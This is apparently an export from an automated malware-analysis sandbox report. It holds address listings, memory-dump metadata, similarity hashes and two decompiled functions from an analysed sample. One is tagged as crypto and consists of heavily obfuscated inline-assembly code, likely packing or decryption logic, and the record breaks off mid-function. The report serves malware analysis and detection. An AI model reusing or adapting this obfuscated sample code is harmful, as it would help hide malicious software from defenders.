                                                                                                    0x0044b662
                                                                                                    0x0044b668
                                                                                                    0x0044b668
                                                                                                    0x0044b67a
                                                                                                    0x0044b680
                                                                                                    0x0044b685
                                                                                                    0x0044b68b
                                                                                                    0x0044b697
                                                                                                    0x0044b6a5
                                                                                                    0x0044b6ac
                                                                                                    0x0044b6b2
                                                                                                    0x0044b6b4
                                                                                                    0x0044b6b6
                                                                                                    0x0044b6bc
                                                                                                    0x0044b6cd
                                                                                                    0x0044b6d4
                                                                                                    0x0044b6e5
                                                                                                    0x0044ba2d
                                                                                                    0x0044ba2d
                                                                                                    0x0044ba33
                                                                                                    0x0044ba39
                                                                                                    0x0044ba3f
                                                                                                    0x0044ba45
                                                                                                    0x0044ba4b
                                                                                                    0x0044ba52
                                                                                                    0x0044ba59
                                                                                                    0x0044ba68
                                                                                                    0x0044ba73
                                                                                                    0x0044ba79
                                                                                                    0x0044ba7f
                                                                                                    0x0044ba82
                                                                                                    0x0044ba88
                                                                                                    0x0044ba8e
                                                                                                    0x0044ba94
                                                                                                    0x0044ba9a
                                                                                                    0x0044ba9b
                                                                                                    0x0044baa1
                                                                                                    0x0044baa7
                                                                                                    0x0044baa9
                                                                                                    0x0044baab
                                                                                                    0x0044bab1
                                                                                                    0x0044bab7
                                                                                                    0x0044babd
                                                                                                    0x0044bac9
                                                                                                    0x0044bad0
                                                                                                    0x0044bad9
                                                                                                    0x0044bae6
                                                                                                    0x0044baed
                                                                                                    0x0044baf3
                                                                                                    0x0044bafa
                                                                                                    0x0044bafd
                                                                                                    0x0044bb03
                                                                                                    0x0044bb06
                                                                                                    0x0044bb0c
                                                                                                    0x0044bb12
                                                                                                    0x0044bb18
                                                                                                    0x0044bb24
                                                                                                    0x0044bb2a
                                                                                                    0x0044bb31
                                                                                                    0x0044bb37
                                                                                                    0x0044bb3d
                                                                                                    0x0044bb43
                                                                                                    0x0044bb4f
                                                                                                    0x0044bb55
                                                                                                    0x0044bb61
                                                                                                    0x0044bb6d
                                                                                                    0x0044bb73
                                                                                                    0x0044bb7a
                                                                                                    0x0044bb7c
                                                                                                    0x0044bb7f
                                                                                                    0x0044bb86
                                                                                                    0x0044bb8c
                                                                                                    0x0044bb96
                                                                                                    0x0044bb9b
                                                                                                    0x0044bba1
                                                                                                    0x0044bba7
                                                                                                    0x0044bbad
                                                                                                    0x0044bbb4
                                                                                                    0x0044bbbb
                                                                                                    0x0044bbc1
                                                                                                    0x0044bbc7
                                                                                                    0x0044bbce
                                                                                                    0x0044bbd6
                                                                                                    0x0044bbd9
                                                                                                    0x0044bbdb
                                                                                                    0x0044bbed
                                                                                                    0x0044bbf3
                                                                                                    0x0044bbf4
                                                                                                    0x0044bbfa
                                                                                                    0x0044bbfa
                                                                                                    0x0044ba27
                                                                                                    0x0044b9a4
                                                                                                    0x0044b91c
                                                                                                    0x0044b902
                                                                                                    0x0044b810
                                                                                                    0x0044b7dd
                                                                                                    0x0044b783

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b7258dc06338c4b4496c7c89b1467fd53fa7b5c8f36077aa60f927c5ef9d4b68
                                                                                                    • Instruction ID: 0c716ef901c9a34eb64ba43231fce89b614d9d79764887fbcbce09d0a1971157
                                                                                                    • Opcode Fuzzy Hash: b7258dc06338c4b4496c7c89b1467fd53fa7b5c8f36077aa60f927c5ef9d4b68
                                                                                                    • Instruction Fuzzy Hash: 2B028432908784CFD705DF38D99AB453FB1F756324B08424EC9A1A3692D738261ACF89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A9849B, Relevance: .3, Instructions: 290COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E00A9849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0xb5f9c0);
				E00ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0xb77b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E00A9CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E00AA2280( *[fs:0x30], 0xb78550);
						_t139 =  *0xb77b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E00ABF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E00A9FFB0(_t193, _t235, 0xb78550);
								L5:
								return E00ADD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E00A81C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0xb77b9c; // 0x0
							_t235 = L00AA4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0xb77b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E00ABA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E00A9FFB0(_t193, _t235, 0xb78550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L00AA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L00AA77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0xb77b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0xb77b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E00AC37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0xb77b9c; // 0x0
									_t214 = L00AA4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E00AC37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0xb77b10 =  *0xb77b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0xb77b04 =  *0xb77b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L00AA77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L00AA77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0xb77b08 =  *0xb77b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E00AC57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E00ACF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L00AA77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E00ABA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L00AA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E00AC96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                                    0x00a9849b
                                                                                                    0x00a9849b
                                                                                                    0x00a9849b
                                                                                                    0x00a9849b
                                                                                                    0x00a9849d
                                                                                                    0x00a984a2
                                                                                                    0x00a984a7
                                                                                                    0x00a984b1
                                                                                                    0x00a984d8
                                                                                                    0x00000000
                                                                                                    0x00a984b3
                                                                                                    0x00a984c4
                                                                                                    0x00a984c9
                                                                                                    0x00a984cd
                                                                                                    0x00a984cf
                                                                                                    0x00a984cf
                                                                                                    0x00a984d6
                                                                                                    0x00a984e6
                                                                                                    0x00a984e9
                                                                                                    0x00a984ec
                                                                                                    0x00a984ef
                                                                                                    0x00a984f2
                                                                                                    0x00a984f4
                                                                                                    0x00a984fc
                                                                                                    0x00a98501
                                                                                                    0x00a98506
                                                                                                    0x00a98509
                                                                                                    0x00a986e0
                                                                                                    0x00a986e5
                                                                                                    0x00a986e8
                                                                                                    0x00a986ed
                                                                                                    0x00a986f0
                                                                                                    0x00a986f2
                                                                                                    0x00ae9afd
                                                                                                    0x00ae9b02
                                                                                                    0x00a984da
                                                                                                    0x00a984df
                                                                                                    0x00a984df
                                                                                                    0x00a986fa
                                                                                                    0x00a986fd
                                                                                                    0x00a986fe
                                                                                                    0x00a98701
                                                                                                    0x00a98706
                                                                                                    0x00a98709
                                                                                                    0x00a9870b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a98711
                                                                                                    0x00a98725
                                                                                                    0x00a98727
                                                                                                    0x00a9872a
                                                                                                    0x00a9872c
                                                                                                    0x00ae9af0
                                                                                                    0x00ae9af5
                                                                                                    0x00a98732
                                                                                                    0x00a98732
                                                                                                    0x00a98732
                                                                                                    0x00a98735
                                                                                                    0x00a98737
                                                                                                    0x00a98515
                                                                                                    0x00a98515
                                                                                                    0x00a98518
                                                                                                    0x00a9851d
                                                                                                    0x00a98523
                                                                                                    0x00a98527
                                                                                                    0x00a9852b
                                                                                                    0x00a98537
                                                                                                    0x00a98539
                                                                                                    0x00a9853c
                                                                                                    0x00a9853e
                                                                                                    0x00a9868c
                                                                                                    0x00a98691
                                                                                                    0x00a98699
                                                                                                    0x00a9869b
                                                                                                    0x00a98744
                                                                                                    0x00a98748
                                                                                                    0x00a986a1
                                                                                                    0x00a986a1
                                                                                                    0x00a986a1
                                                                                                    0x00a986a4
                                                                                                    0x00a986a8
                                                                                                    0x00ae9bdf
                                                                                                    0x00ae9bdf
                                                                                                    0x00a986ae
                                                                                                    0x00a986b0
                                                                                                    0x00000000
                                                                                                    0x00a986b6
                                                                                                    0x00000000
                                                                                                    0x00ae9be9
                                                                                                    0x00a986b0
                                                                                                    0x00a98544
                                                                                                    0x00a9854a
                                                                                                    0x00a9854d
                                                                                                    0x00a98551
                                                                                                    0x00a9876e
                                                                                                    0x00a98778
                                                                                                    0x00a9877b
                                                                                                    0x00a98780
                                                                                                    0x00a98557
                                                                                                    0x00a98557
                                                                                                    0x00a9855d
                                                                                                    0x00a9855d
                                                                                                    0x00a9856b
                                                                                                    0x00a9856e
                                                                                                    0x00a98570
                                                                                                    0x00a98573
                                                                                                    0x00a98576
                                                                                                    0x00a98576
                                                                                                    0x00a98579
                                                                                                    0x00a9857b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a98581
                                                                                                    0x00a985a0
                                                                                                    0x00a985a2
                                                                                                    0x00a985a5
                                                                                                    0x00a985a7
                                                                                                    0x00ae9b1b
                                                                                                    0x00ae9b1b
                                                                                                    0x00a9862e
                                                                                                    0x00a9862e
                                                                                                    0x00a98631
                                                                                                    0x00a98631
                                                                                                    0x00a98634
                                                                                                    0x00a98636
                                                                                                    0x00a98669
                                                                                                    0x00a98669
                                                                                                    0x00a9866b
                                                                                                    0x00ae9bbf
                                                                                                    0x00ae9bc4
                                                                                                    0x00ae9bc8
                                                                                                    0x00ae9bce
                                                                                                    0x00ae9bce
                                                                                                    0x00a98671
                                                                                                    0x00a98671
                                                                                                    0x00a98674
                                                                                                    0x00a98676
                                                                                                    0x00ae9bae
                                                                                                    0x00ae9bae
                                                                                                    0x00a98676
                                                                                                    0x00a9867c
                                                                                                    0x00a9867e
                                                                                                    0x00a98688
                                                                                                    0x00a98688
                                                                                                    0x00000000
                                                                                                    0x00a9867e
                                                                                                    0x00a98638
                                                                                                    0x00a98638
                                                                                                    0x00a9863b
                                                                                                    0x00a9863e
                                                                                                    0x00a9863f
                                                                                                    0x00a98642
                                                                                                    0x00a98645
                                                                                                    0x00a98648
                                                                                                    0x00a9864d
                                                                                                    0x00ae9b69
                                                                                                    0x00ae9b6e
                                                                                                    0x00ae9b7b
                                                                                                    0x00ae9b81
                                                                                                    0x00ae9b85
                                                                                                    0x00ae9b89
                                                                                                    0x00ae9ba7
                                                                                                    0x00ae9b8b
                                                                                                    0x00ae9b91
                                                                                                    0x00ae9b9a
                                                                                                    0x00ae9b9f
                                                                                                    0x00ae9b9f
                                                                                                    0x00a98788
                                                                                                    0x00a9878d
                                                                                                    0x00a98763
                                                                                                    0x00a98763
                                                                                                    0x00a98766
                                                                                                    0x00000000
                                                                                                    0x00a98766
                                                                                                    0x00ae9b70
                                                                                                    0x00000000
                                                                                                    0x00ae9b70
                                                                                                    0x00a98656
                                                                                                    0x00a9865a
                                                                                                    0x00a9865c
                                                                                                    0x00a98752
                                                                                                    0x00a98756
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9875e
                                                                                                    0x00000000
                                                                                                    0x00a9875e
                                                                                                    0x00a98662
                                                                                                    0x00a98662
                                                                                                    0x00a98662
                                                                                                    0x00a98666
                                                                                                    0x00000000
                                                                                                    0x00a98666
                                                                                                    0x00a985b7
                                                                                                    0x00a985b9
                                                                                                    0x00a985bc
                                                                                                    0x00a985bf
                                                                                                    0x00a985cc
                                                                                                    0x00a985d1
                                                                                                    0x00a985d4
                                                                                                    0x00a985db
                                                                                                    0x00a985de
                                                                                                    0x00a985e0
                                                                                                    0x00ae9b5f
                                                                                                    0x00000000
                                                                                                    0x00ae9b5f
                                                                                                    0x00a985e6
                                                                                                    0x00a985ea
                                                                                                    0x00a986c3
                                                                                                    0x00a986c5
                                                                                                    0x00a986c8
                                                                                                    0x00a986ca
                                                                                                    0x00ae9b16
                                                                                                    0x00000000
                                                                                                    0x00ae9b16
                                                                                                    0x00a986d6
                                                                                                    0x00a985f6
                                                                                                    0x00a985f6
                                                                                                    0x00a985f9
                                                                                                    0x00a98602
                                                                                                    0x00a98606
                                                                                                    0x00a9860a
                                                                                                    0x00a9860b
                                                                                                    0x00a9860e
                                                                                                    0x00a98611
                                                                                                    0x00000000
                                                                                                    0x00a98611
                                                                                                    0x00a985f3
                                                                                                    0x00000000
                                                                                                    0x00a985f3
                                                                                                    0x00a98619
                                                                                                    0x00a9861e
                                                                                                    0x00a9861e
                                                                                                    0x00a98621
                                                                                                    0x00a98622
                                                                                                    0x00a98623
                                                                                                    0x00a98625
                                                                                                    0x00a9862c
                                                                                                    0x00000000
                                                                                                    0x00a9873d
                                                                                                    0x00000000
                                                                                                    0x00a9873d
                                                                                                    0x00a98737
                                                                                                    0x00a9850f
                                                                                                    0x00a98512
                                                                                                    0x00000000
                                                                                                    0x00a98512
                                                                                                    0x00000000
                                                                                                    0x00a984d6

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 149fa81ce5cbcc0bff732f9e0e94146b31e645d2363e53843a0df9b3569e4ec3
                                                                                                    • Instruction ID: a6ebbfd9430a0a5782d28ebad414240848cbe7f00470542312671058f56b807a
                                                                                                    • Opcode Fuzzy Hash: 149fa81ce5cbcc0bff732f9e0e94146b31e645d2363e53843a0df9b3569e4ec3
                                                                                                    • Instruction Fuzzy Hash: 1CB116B0E04349DFCF14DFA9C984AAEBBF5BF4A304F20412AE505AB256DB74AD45CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044C021, Relevance: .3, Instructions: 278COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 50%
                                                                                                    			E0044C021(signed char __eax, signed char __ebx, signed char __ecx, signed int __edx, void* __edi, signed int __esi, void* __eflags) {
				signed char _t44;
				signed char _t46;
				signed char _t49;
				signed char _t50;
				signed int _t54;
				signed int _t67;
				signed int _t71;
				signed int _t73;

				_t67 = __esi;
				_t54 = __edx;
				_t49 = __ecx;
				_t46 = __ebx;
				_t44 = __eax;
				_push(__edi);
				if(__eflags != 0) {
					L1:
					_t71 = _t71 -  *0xd6d4e09;
					_push( *0x92af3c21);
					asm("adc edi, [0xdd0dd9fc]");
				} else {
					asm("rcr dword [0xaaa8a875], 0x98");
					asm("rcr byte [0x6ae3c8a0], 0x62");
					_pop( *0x789ca8f4);
					 *0xe4e9d3f =  *0xe4e9d3f >> 0x8a;
					__ebx = __ebx &  *0x32cf4389;
					 *0xdd62468c =  *0xdd62468c - __esi;
					 *0xb0bc98e0 =  *0xb0bc98e0 ^ __ch;
					__eflags = __edi -  *0x9110b9c8;
					__edi = 0x325e11f5;
					asm("rcl byte [0x202205e1], 0x63");
					 *0xc9203b0f =  *0xc9203b0f & __edx;
					__edx = __edx +  *0x12ca20a9;
					__eflags = __ah & 0x000000b5;
					asm("sbb esi, 0x6a14c267");
					asm("adc ebx, [0xdec4b21b]");
					__eflags =  *0x336ab6bd & __eax;
					asm("stosd");
					__edi =  *0x8353239e;
					 *0xd5802015 =  *0xd5802015 ^ __edi;
					_push(__esi);
					asm("scasd");
					__eax =  *0x13082469 * 0x97;
					__eflags =  *0x13082469 * 0x97;
					asm("cmpsb");
					if( *0x13082469 * 0x97 < 0) {
						goto L1;
					} else {
						__eax =  *0x1d074072;
						 *0x9d3f789c =  *0x9d3f789c | __esp;
						__esi = __esi - 1;
						asm("rcr byte [0xcf697112], 0x6f");
						 *0xbd6b0713 =  *0xbd6b0713 & __edx;
						__dh = __dh + 0x34;
						__eflags = __ebx -  *0x94e66089;
						 *0x239eab36 =  *0x239eab36 ^ __ebx;
						_push(__ebx);
						__ebp = __ebp ^ 0x45871183;
						 *0xeb31531a = __dh;
						 *0xcbb8bbb6 =  *0xcbb8bbb6 & __bh;
						 *0xb1d1dfb8 =  *0xb1d1dfb8 - __edx;
						__esi =  *0xc20fe6a * 0x51a0;
						__eflags = __esi;
						asm("rol byte [0xdd2c6428], 0x60");
						if(__esi >= 0) {
							goto L1;
						} else {
							__edx = __edx &  *0x559e0379;
							__edi = __edi &  *0x1d15dbc2;
							__eflags =  *0x690ab8f3 & __edx;
							 *0x43033e95 =  *0x43033e95 + __esp;
							__eflags =  *0x43033e95;
							if(__eflags != 0) {
								goto L1;
							} else {
								_pop( *0x38835f7b);
								_pop( *0x9c1df63b);
								if(__eflags < 0) {
									goto L1;
								} else {
									 *0x4e9d3f78 =  *0x4e9d3f78 | __esp;
									asm("rcr byte [0x183de114], 0x7e");
									__edi = __edi ^ 0x8503e496;
									__eflags =  *0x77f240f6 & __bl;
									asm("sbb [0x669f60a2], dh");
									_push(__edx);
									asm("sbb ah, [0x6c5dacb1]");
									__eflags =  *0xc169780e & __esp;
									__ecx = __ecx ^ 0xe198dffc;
									_push(__eax);
									__edx = __edx |  *0xb0bc988f;
									__eflags = __edx;
									_t31 = __esp;
									__esp =  *0x1515b9c8;
									 *0x1515b9c8 = _t31;
									if(__edx > 0) {
										goto L1;
									} else {
										asm("rcr dword [0x2be78e77], 0xe9");
										asm("rcl dword [0xc97880d8], 0x54");
										__edx = __edx ^ 0xb316ad67;
										__edi = __edi + 1;
										__esi = __esi - 1;
										asm("rol dword [0x7eda2a62], 0x47");
										asm("movsw");
										__esi = __esi - 1;
										asm("rcr dword [0x5845e411], 0xf3");
										asm("adc al, 0xa");
										_pop(__ebp);
										 *0xb7b53a0e =  *0xb7b53a0e >> 0xdb;
										__eflags = __edx -  *0xbd388f29;
										_t32 = __al;
										__al =  *0x20e73884;
										 *0x20e73884 = _t32;
										 *0x13af490d =  *0x13af490d ^ __edi;
										__eflags =  *0x60aed9b - __eax;
										asm("sbb [0xa075108], bl");
										__bh = __bh + 0x2c;
										 *0x19b3143b = __ebp;
										__edx = __edx ^ 0x7d671387;
										__esp =  *0xd5ddcd96;
										__eflags =  *0xb018ecbf & __esp;
										 *0xacb15266 =  *0xacb15266 - __ecx;
										_pop(__ebp);
										__edx = __edx &  *0xc7f5146c;
										asm("ror byte [0xdf334f1a], 0xd6");
										__eax = __eax ^ 0x7fc075fb;
										__ebx = __ebx &  *0xb10fe6ec;
										__eflags = __eax -  *0xacb15266;
										_pop(__ebp);
										__ecx = __ecx ^  *0xcc520c6c;
										_pop(__ebp);
										asm("scasb");
										__ecx = __ecx &  *0x3800901;
										 *0xdbc2559e =  *0xdbc2559e ^ __eax;
										asm("adc edi, 0x3d2f20f");
										asm("adc [0xd6e6fe10], dh");
										asm("adc [0x88b6a596], edi");
										 *0xe390ca02 =  *0xe390ca02 >> 6;
										 *0x8431790c =  *0x8431790c & __dh;
										__eflags =  *0x8431790c;
										_push( *0x78f75206);
										asm("adc esp, [0xc2559e03]");
										asm("sbb edi, [0x5bfa16db]");
										asm("rcl dword [0xb88b4d35], 0x2f");
										asm("rol byte [0x22732ee4], 0xc1");
										if( *0x8431790c != 0) {
											goto L1;
										} else {
											__esi = __esi | 0x88b71a7a;
											 *0x69253083 =  *0x69253083 - __ebx;
											__eflags = __edi - 0xf21e7962;
											asm("sbb ah, [0x17c52110]");
											 *0xe561cd91 =  *0xe561cd91 << 0xc;
											__eflags =  *0xebfafee4 - __dl;
											__edi = __edi + 1;
											__eflags = __bh -  *0xca22a0b0;
											__esi = __esi & 0xada7420e;
											asm("sbb ebp, [0xae6b4dff]");
											asm("ror byte [0xbc988a30], 0x2f");
											__eflags =  *0x12b9c8b0 & __ah;
											asm("adc eax, [0x19e69bdc]");
											__eflags =  *0x58e3b601 & __esi;
											__ebp = __ebp + 1;
											 *0x36aa3ace =  *0x36aa3ace << 0x8d;
											asm("stosd");
											__eflags =  *0x8353239e & __edx;
											_push( *0xd4812017);
											__eax = __eax - 1;
											__eflags = __eax;
											asm("scasd");
											if(__eax == 0) {
												goto L1;
												do {
													do {
														do {
															do {
																do {
																	do {
																		goto L1;
																	} while (_t71 >= 0);
																	_t50 = _t49 - 1;
																	asm("rol dword [0xa9553596], 0xc3");
																	_t67 = _t67 + 1;
																	 *0xe0879028 =  *0xe0879028 | _t50;
																	_t49 = _t50 +  *0x8dbda16;
																	_t54 = 0xc3b1061 -  *0x29e2c8dc;
																	_push( *0x6f95ed05);
																} while (0xc3b1061 >= 0xff834b9);
																_t67 = _t67 & 0x3491e20e;
																_t49 =  *0xf0ece6bd;
																 *0xf0ece6bd =  *0x310d487d * 0xc9ee;
																 *0x54133b1e =  *0x54133b1e ^ _t71;
																asm("rol dword [0x49f2711d], 0x37");
																asm("sbb edi, [0xf6fb63f0]");
															} while ( *0x54133b1e >= 0);
															_t71 = _t71 -  *0xf052e179;
															 *0x898fdca2 =  *0x898fdca2 << 0x59;
															asm("sbb esi, 0x7a830803");
															asm("sbb dl, [0xedb00aca]");
															asm("sbb ah, [0x86651c38]");
															 *0xb4e1bdb = _t54;
															_t73 = _t73 ^  *0x1d05d9df;
															_t54 =  *0x4863efee;
															 *0x4863efee =  *0xb4e1bdb;
															_t46 = (_t46 | 0x0000003a) &  *0xce97fdce | 0x0000000a;
														} while (_t46 > 0);
														 *0x34facd17 =  *0x34facd17 << 0xd0;
														asm("adc ecx, 0xce473839");
														asm("adc [0xdd4b29e2], dl");
														asm("lodsd");
														asm("rol byte [0x3abc98a2], 0x27");
														_t67 = 0xa9f28bd8 +  *0x12e391ce;
														_push(_t73);
														_push(_t71);
														 *0x1bf947f0 =  *0x1bf947f0 - _t73;
														_t73 = _t73 ^ 0x0286d09b;
														_t44 = _t44 & 0x000000d2;
														asm("sbb eax, [0x8260a58e]");
														_t46 = _t46 - 1;
